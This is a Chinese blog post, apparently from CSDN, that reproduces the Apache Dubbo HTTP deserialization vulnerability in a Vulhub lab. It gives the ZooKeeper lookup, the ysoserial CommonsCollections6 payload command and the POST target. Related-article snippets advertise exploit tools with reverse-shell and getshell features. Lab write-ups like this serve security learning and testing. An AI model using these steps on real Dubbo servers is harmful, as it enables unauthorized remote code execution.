Vulhub靶场Dubbo Java反序列化漏洞复现

最新推荐文章于 2024-05-02 22:16:10 发布
最新推荐文章于 2024-05-02 22:16:10 发布
阅读量222 收藏
点赞数
文章标签: dubbo java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/X_python321/article/details/132078918
版权

免责声明:本文仅用于技术交流和知识分享目的。漏洞复现涉及到系统和网络的安全性测试,可能导致系统崩溃、数据丢失或其他问题。读者在尝试漏洞复现之前必须获得合法授权,并自行承担一切风险和责任。

漏洞描述:

Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的`org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter`类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。

漏洞影响版本:

>=Apache Dubbo 2.7.4

漏洞复现版本:

Apache Dubbo 2.7.3

复现过程:

1:使用vulhub中靶场启动环境

2:下载zookeeper

Apache ZooKeeper

2:kali中执行./zhCli.sh -server your-ip:2181连接Zookeeper服务器

3:进入服务器后获取到RPC接口为org.vulhub.api.CalcService

4:利用开源工具ysoserial-all  项目地址:GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

Tips:直接执行java -jar ysoserial.jar CommonsCollections6 "touch /tmp/success" > 1.poc会报错,将报错信息交给chatgpt得到优化后命令为java --add-opens java.base/java.util=ALL-UNNAMED -jar ysoserial.jar CommonsCollections6 "touch /tmp/success" > 1.poc

利用生成的Payload作为POST Body发送到`http://your-ip:8080/org.vulhub.api.CalcService`即可触发反序列化漏洞:

5:进入容器查看tmp目录下已生成success,表示命令得到成功执行。

3ize0f
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java-rmi-registry反序列化漏洞复现
0xSec
12-25 1609
java.rmi.registry是java语言的一个包
java 漏洞复现_Apache Shiro java反序列化漏洞复现
weixin_42526484的博客
03-02 172
Apache Shiro java反序列化漏洞复现 影响版本Apache Shiro <= 1.2.4环境搭建准备环境攻击机: Windows或者Linux (我用的是windows10 1903)、ysoserial-0.0.6-SNAPSHOT-all.jar、python环境、Java环境**靶机:**带docker的Linux就行靶机环境搭建获取docker镜像docker pull...
Aapche Dubbo Java反序列化漏洞复现
Tauil的博客
07-29 530
将以下工具下载到攻击机中ZooKeeper — 输入以下命令,下载完成后解压即可 ysoserial — 输入下面命令,如果该方式下载不成功直接浏览器访问网站下载 漏洞复现 准备攻击机,靶机安装有的靶机中输入下列命令开启环境 攻击机终端中输入 发现了2181端口是用于转发服务的,那么其作用可能是用于目标网页进行api服务转发,所以该端口可能包含了registry(远程注册表服务器,一般都是用ZooKeeper作为registry,我们可以尝试通过 zookeeper 进行连接进入先前下载的 zooke
2024年WebGoat JAVA反序列化漏洞分析复现_webgoat反序列化
最新发布
2401_84264610的博客
05-02 41
该方法代码如下,首先第6行进行传参token,跟到第10行,在进行反序列化对象创建的时候,进行了base64解码并返回到ois变量。并在13行进行了读取序列化内容,之后在14行进行判断是否为vulnerableTaskHolder对象跟进org.dummy.insecure.framework.VulnerableTaskHolder对象之后在59行处执行了exec。参数为.taskAction,所以直接往上跟该变量初始化发现了使用有参构造进行了赋值(因没动态分析,没搞懂t变量怎么赋值)0x03 利用。
Java反序列化高危漏洞重现
qq_45498778的博客
11-27 335
Java反序列化漏洞存在着极大危害,今天我来为大家重现一下。
复现java反序列化漏洞的方法
weixin_47623655的博客
03-30 1567
在本文中,我们学习了如何使用ysoserial来生成恶意payload,以及如何利用Python的SimpleHTTPServer模块来搭建一个HTTP服务器来接收Tomcat发送的数据包。当反序列化一个包含恶意代码的序列化数据时,攻击者可以利用该漏洞在目标系统上执行任意代码,导致系统崩溃或数据泄露。通过上面的步骤,我们可以成功地复现Java反序列化漏洞,并在使用ysoserial生成恶意payload之后,我们需要将其发送到目标服务器进行验证漏洞是否存在。接下来,我们需要构造一个包含这个类的序列化数据。
CVE-2019-17564 Apache Dubbo Http 反序列化漏洞深入分析 .pdf
09-05
一旦配置完成,启动Dubbo服务,攻击者就可以通过构造特定的POST请求,利用这个反序列化漏洞。 针对此类安全问题,企业应当重视安全测试和安全建设,特别是金融和网络信息安全领域。定期进行渗透测试,监控和修复...
CVE-2019-17564 Apache-Dubbo反序列化漏洞.md
04-12
CVE-2019-17564,Apache-Dubbo反序列化漏洞
dubbo-exp:Dubbo反序列化一键快速攻击测试工具,支持dubbo协议和http协议,支持hessian反序列化java原生反序列化
05-09
工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果使用者负责Dubbo反序列化测试工具使用帮助usage: java -jar exp.jar [OPTION]-h --help 帮助信息-l --list 输出所有gadget信息-g --gadget ...
java调试技能之dubbo调试
02-24
dubbo作为一个远程调用框架,虽与同类型的框架,不知道谁优谁劣,但是就公司层面使用来说,还是很棒的。这里简单的写一下怎么使用和调试技巧,就算是作个使用总结吧,供快速使用和问题解决!dubbo是基于spring做配置...
[Timeline Sec] - CVE-2020-1948:Dubbo Provider默认反序列化复现1
08-03
Dubbo反序列化漏洞CVE-2020-1948详解】 Dubbo,由阿里巴巴开源,是一款高性能的服务框架,它使得应用可以通过RPC实现服务的输入和输出功能,并且能够与Spring框架无缝集成。然而,2020年,腾讯安全团队发现了一个...
javaRMI反序列化漏洞验证工具
08-21
检测javaRMI反序列化漏洞
Java反序列化漏洞利用工具(WebLogic&Jboss;)
10-10
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
Java反序列化漏洞利用工具(全)
09-14
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以……
WebGoat JAVA反序列化漏洞分析复现
leah126的博客
03-09 635
该方法代码如下,首先第6行进行传参token,跟到第10行,在进行反序列化对象创建的时候,进行了base64解码并返回到ois变量。但根据上面的代码分析也得知需要在提交之后,会进行base64解码,所以需要提前加密,但是像这种序列化数据直接copy出来并加密的话。为此写了加密的小工具。进行简单分析一波之后,使用ysoserial生成序列化的payload,这里的话不做过多讲解,具体使用应该大家都会。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
反序列化漏洞vulhub靶场serial
yjc1517的博客
07-20 364
夺旗成功
不安全的反序列化(php&java)及漏洞复现
weixin_58954236的博客
09-06 1468
class Stu{在unserialize文件夹下新建一个stu.class.php文件,将上述代码复制进去。class(关键字:类),stu是类名。
Web安全--反序列化漏洞java篇)
bobo_milk的博客
11-29 3103
java反序列化参考
记录一次vulhub:Weblogic反序列化漏洞复现(CVE-2017-10271)
sszsNo1的博客
06-26 141
复现vulhub:Weblogic反序列化漏洞复现(CVE-2017-10271)
dubbo java
03-24
Dubbo是一个高性能的Java RPC框架,用于构建分布式服务架构。它提供了一种可靠的远程调用机制,使得应用程序可以像调用本地方法一样调用远程服务。以下是Dubbo的一些特性和配置示例[^1]: 1. 高性能:Dubbo采用了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值